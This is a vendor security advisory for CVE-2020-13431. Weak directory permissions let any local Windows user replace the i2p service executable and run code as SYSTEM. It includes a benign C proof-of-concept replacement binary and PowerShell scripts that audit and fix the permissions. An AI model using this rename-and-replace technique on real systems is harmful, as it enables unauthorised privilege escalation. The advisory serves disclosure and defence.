Security advisory: i2p for Windows local privilege escalation

security research, advisory, i2p, vulnerability, privilege escalation

Advisory information

Title: i2p for Windows local privilege escalation
Advisory reference: BLAZE-02-2020
Product: i2p 0.7.5 to 0.9.45 for Windows
CVE reference: CVE-2020-13431
Disclosure mode: Coordinated

Product description

i2p (The Invisible Internet Project) is an anonymous network, exposing a simple layer that applications can use to anonymously and securely send messages to each other.

Frequently, I2P is compared to Tor as an anonymity tool.

Vulnerability details

During installation, the I2P Windows client offers to also register itself as a Windows service, named I2PSvc.

The service runs as SYSTEM and is started automatically when the operating system boots. While inspecting I2P for Windows, it was noticed that the installer creates its directory under Program Files with very lax permissions, allowing any local user to replace I2PSvc.exe with a malicious executable.

To exploit the vulnerability, an attacker needs only an unprivileged local account on the system.

The vulnerability was found in the latest version at the time, 0.9.45, but has affected I2P since the 0.7 series of releases, more than a decade ago.

I2P installs itself in C:\Program Files\i2p.

As can be seen in the cacls output below, the "F" (full control) entry for BUILTIN\Users means every local user has full control over the directory and, through inheritance, over the files and subfolders beneath it, including I2PSvc.exe:

[Screenshot: cacls output for C:\Program Files\i2p showing BUILTIN\Users with full control]

By replacing the service executable with a malicious one, an attacker can execute code with SYSTEM privileges the next time the service starts, typically at the next reboot. Because Windows keeps the image of a running service open, the original I2PSvc.exe cannot simply be overwritten while the service is running; with full control over the directory, however, the attacker can rename it out of the way and drop the replacement under the original name.
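The same misconfiguration can exist for any service, so the check a practitioner wants is not "look at one directory" but "walk every service and flag binaries or parent directories that low-privilege principals can modify". The PowerShell below is an added example, not code from the advisory or from the I2P project. It assumes the well-known SID list and the rights mask shown (which treat file-create, delete and permission-change rights on the directory as tamper rights, for the rename-and-replace route described above); both are choices made here, not something the advisory specifies.

```powershell
# Added example, not code from the advisory or from the I2P project: audit every
# installed Windows service for an executable, or a parent directory, that
# low-privilege principals can modify. A hit on a service that runs as
# LocalSystem is exactly the I2PSvc pattern described above.

# Well-known SIDs that every local user belongs to (assumed list; extend it if
# your environment has its own broad groups).
$LowPrivSids = @(
    'S-1-1-0',       # Everyone
    'S-1-5-11',      # Authenticated Users
    'S-1-5-32-545',  # BUILTIN\Users
    'S-1-5-4'        # INTERACTIVE
)

# Rights that allow replacing or tampering with the target. On a directory,
# WriteData is "create files", and Delete/DeleteSubdirectoriesAndFiles let the
# attacker rename the original binary out of the way. The two raw values are
# GENERIC_ALL and GENERIC_WRITE, which some ACEs carry instead of specific bits.
$R = [System.Security.AccessControl.FileSystemRights]
[int]$TamperMask = [int]$R::WriteData -bor [int]$R::AppendData -bor [int]$R::Delete -bor
                   [int]$R::DeleteSubdirectoriesAndFiles -bor [int]$R::ChangePermissions -bor
                   [int]$R::TakeOwnership -bor 0x10000000 -bor 0x40000000

function Get-TamperAce {
    # Emits one object per Allow ACE on $Path that gives a low-privilege SID tamper rights.
    param([Parameter(Mandatory)][string]$Path)
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }   # orphaned or unresolvable account
        if ($LowPrivSids -notcontains $sid) { continue }
        if (([int]$ace.FileSystemRights -band $TamperMask) -ne 0) {
            [pscustomobject]@{ Path = $Path; Principal = $ace.IdentityReference.Value; Rights = $ace.FileSystemRights }
        }
    }
}

function Find-WritableServiceBinary {
    # Walks all services, pulls the executable out of the image path, and checks
    # both the file and the directory that contains it.
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        if (-not $svc.PathName) { continue }
        # Quoted or unquoted image path, up to the first ".exe"; arguments are dropped.
        if ($svc.PathName -match '^\s*"?(?<exe>[^"]+?\.exe)') {
            $exe = [Environment]::ExpandEnvironmentVariables($Matches['exe'])
        } else { continue }
        if (-not (Test-Path -LiteralPath $exe -PathType Leaf)) { continue }
        $dir = Split-Path -LiteralPath $exe -Parent
        foreach ($target in @($exe, $dir)) {
            foreach ($hit in @(Get-TamperAce -Path $target)) {
                [pscustomobject]@{
                    Service   = $svc.Name
                    RunsAs    = $svc.StartName
                    StartMode = $svc.StartMode
                    Target    = $hit.Path
                    Principal = $hit.Principal
                    Rights    = $hit.Rights
                }
            }
        }
    }
}

# On a vulnerable I2P install this lists I2PSvc with RunsAs LocalSystem and
# BUILTIN\Users holding FullControl on both the directory and the executable.
Find-WritableServiceBinary | Sort-Object Service, Target | Format-Table -AutoSize
```

The script only inspects ACEs granted to the broad groups listed; an ACE for a specific user or a custom group is not flagged, and the ACL of a directory the caller cannot read is silently skipped, so run it once as the low-privileged user you are modelling and once elevated. Any row whose RunsAs is LocalSystem and whose StartMode is Auto is a reboot-triggered path to SYSTEM, which is what this advisory describes.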

Proof of concept

Below we can see the weak permissions of the i2p service:

[Screenshots: ACL of the I2PSvc service and of I2PSvc.exe, showing BUILTIN\Users with full control]

The following C code serves as a proof of concept for the attack. Compiled and dropped in place of I2PSvc.exe, it appends a line to a text file on the desktop of the attacker's unprivileged user, lowpriv, recording which account the executable is running as; when started by the service it reports SYSTEM. Because the replacement does not implement the service control protocol (it never calls StartServiceCtrlDispatcher), the Service Control Manager will report the start as failed, but the payload has already run by then.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strcmp */
#include <windows.h>
#include <lmcons.h>   /* UNLEN */

/*
 * Drop-in replacement for I2PSvc.exe. When the service starts at boot it
 * runs as LocalSystem, so GetUserName() returns "SYSTEM"; the result is
 * appended to a file the low-privileged attacker can read.
 */
int main(void)
{
    char username[UNLEN + 1];
    char szFileName[MAX_PATH];
    DWORD username_len = UNLEN + 1;
    char msg[256];
    FILE *fp;
    /* Attacker-chosen output path: the desktop of the unprivileged user. */
    const char *file = "C:\\Users\\lowpriv\\Desktop\\hello.txt";

    /* Explicit ANSI variants so the build does not depend on UNICODE/TCHAR settings. */
    GetUserNameA(username, &username_len);
    GetModuleFileNameA(NULL, szFileName, MAX_PATH);

    if (!strcmp(username, "SYSTEM")) {
        snprintf(msg, sizeof(msg), "%s is running as %s. Privilege escalation successful.\n", szFileName, username);
    }
    else {
        snprintf(msg, sizeof(msg), "%s is running as %s\n", szFileName, username);
    }

    printf("%s\n", msg);

    /* Append, so repeated service starts accumulate in the same file. */
    fp = fopen(file, "a+");

    if (fp != NULL) {
        fputs(msg, fp);
        fclose(fp);
    }

    return 0;
}

[Screenshot: hello.txt on the lowpriv desktop, reporting that I2PSvc.exe is running as SYSTEM]

Fix and recommendations

Upgrade I2P to version 0.9.46 or later.
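Where an upgrade cannot be rolled out immediately, or to verify that the installed tree is actually protected afterwards, the directory ACL can be corrected directly. The PowerShell below is an added example and is not part of the advisory or of the I2P fix; it assumes the install path named in the advisory and relies on icacls /reset re-applying the default Program Files DACL, which grants standard users read and execute only.

```powershell
# Added example, not part of the advisory or of the I2P fix: tighten the DACL on an
# existing installation so that only Administrators and SYSTEM can modify it,
# while standard users keep read and execute. Run from an elevated prompt.
$InstallDir = 'C:\Program Files\i2p'   # install path named in the advisory

function Get-AllowedRights {
    # Lists the Allow rights a principal holds on $Path, for a before/after comparison.
    param([string]$Path, [string]$Principal)
    (Get-Acl -LiteralPath $Path).Access |
        Where-Object { $_.AccessControlType -eq 'Allow' -and $_.IdentityReference.Value -eq $Principal } |
        ForEach-Object { $_.FileSystemRights }
}

'Before:'
Get-AllowedRights -Path $InstallDir -Principal 'BUILTIN\Users'   # FullControl on a vulnerable install

# Discard every explicit ACE on the tree and re-inherit the Program Files
# defaults (Users: read/execute; Administrators and SYSTEM: full control).
# /T recurses, /C continues past files that cannot be processed.
icacls $InstallDir /reset /T /C | Out-Null

'After:'
Get-AllowedRights -Path $InstallDir -Principal 'BUILTIN\Users'                          # read/execute only
Get-AllowedRights -Path (Join-Path $InstallDir 'I2PSvc.exe') -Principal 'BUILTIN\Users' # read/execute only
```

Fixing the ACL does not undo a replacement that has already happened: before trusting the service again, compare the installed I2PSvc.exe against a clean copy taken from the installer and confirm that the service's image path still points at the expected file.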

Credits

This vulnerability was discovered and researched by Julio Cesar Fort from
Blaze Information Security (https://www.blazeinfosec.com)

Disclosure timeline

28/04/2020: Vulnerability reported to [email protected];
01/05/2020: The I2P product security team confirmed it had reproduced the vulnerability;
16/05/2020: I2P informed Blaze that a patch had been created and asked for validation;
24/05/2020: Blaze confirmed to I2P that the patch fixes the vulnerability;
25/05/2020: MITRE assigned CVE-2020-13431 to this issue;
25/05/2020: I2P informed Blaze that nearly all network nodes would be upgraded to the latest version within the next 48 hours;
29/05/2020: Advisory released.

About Blaze Information Security

Blaze Information Security is a privately held, independent information security firm born from years of combined experience. With presence in South America and Europe, Blaze has a team of senior security engineers with past experience in leading information security consulting companies around the world and a proven track record of published security research.

E-Mail: [email protected]
Wildfire Labs blog: https://blog.blazeinfosec.com
Twitter: https://www.twitter.com/blazeinfosec
Github: https://www.github.com/blazeinfosec

PGP key fingerprint: DB53 D9D9 F0E1 E513 4F52 8219 C33B C7FA C5D0 E926
